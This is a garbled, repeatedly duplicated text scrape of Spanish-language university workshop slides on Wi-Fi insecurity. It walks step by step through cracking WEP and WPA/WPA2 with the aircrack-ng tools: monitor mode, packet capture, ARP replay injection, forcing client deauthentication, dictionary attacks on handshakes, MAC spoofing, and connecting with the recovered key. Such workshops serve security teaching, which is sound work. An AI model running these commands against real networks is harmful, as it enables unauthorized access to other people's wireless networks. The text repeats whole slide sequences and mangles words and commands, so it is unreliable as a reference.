Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 63: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 64: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 65: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

